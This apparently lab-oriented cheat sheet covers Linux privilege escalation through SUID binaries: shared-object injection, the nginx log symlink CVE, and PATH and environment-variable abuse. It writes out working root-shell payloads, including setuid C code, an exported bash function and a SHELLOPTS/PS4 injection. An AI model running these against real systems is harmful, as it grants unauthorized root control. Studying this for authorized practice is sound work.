SUID
Enumeration
find / -perm -u=s -type f 2>/dev/null
will list all the files with the suid perm
Exploitation
Here again we can use GTFOBins and check if our command is in there and has documented exploitation
Practice
You see and example of this exploit in this writeup
SUID - Shared Object Injection
Enumeration
find / -type f -perm -04000 -ls 2>/dev/null
ls -al nameoffile
Exploitation
In our example the file is
/usr/local/bin/suid-so
strace /usr/local/bin/suid-so 2>&1
with a grep on what could be interestingstrace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
this will show us what happens with the file. This is the place to check if we have rights on one of the file it uses. In our example we will use the file in this outputopen("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
Once we find a file we can try to overwrite it with a payload to elevate our privileges
We make a directory for our file
We compile our file
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c
in my example the file I will overright is/home/user/.config/libcalc.so
This way we just need to run the sid file which is
/usr/local/bin/suid-so
in our example
SUID - Binary Symlinks
Issues on log created by nginx
Enumeration
./linuxexploitsuggester.sh
we should have this output[+] [CVE-2016-1247] nginxed-root.sh
or we could manually look for this specific vulnerability by checking nginx versiondpkg -l | grep nginx
Now we need to check if the suid bit is set on sudo
find / -type f -perm -04000 -ls 2>/dev/null
orls -al /usr/bin/sudo
Exploitation
ls -al /var/log/nginx
We will need to create a malicious symlink
We will use this to do so
./nginxed-root.sh /var/log/nginx/error.log
Check out this resource to learn more about this way to escalate
SUID - Environmental Variables
Enumeration
Exploitation
Let's create a malicious service and add it to our path so that it is launched instead of apache
echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
SUID - Environmental Variables with full path to binary
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
instead of creating a malicious bin we create a malicious functionexport -f /usr/sbin/service
then we export our function in the path/usr/local/bin/suid-env2
finally we just need to launch the service ORenv -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
Last updated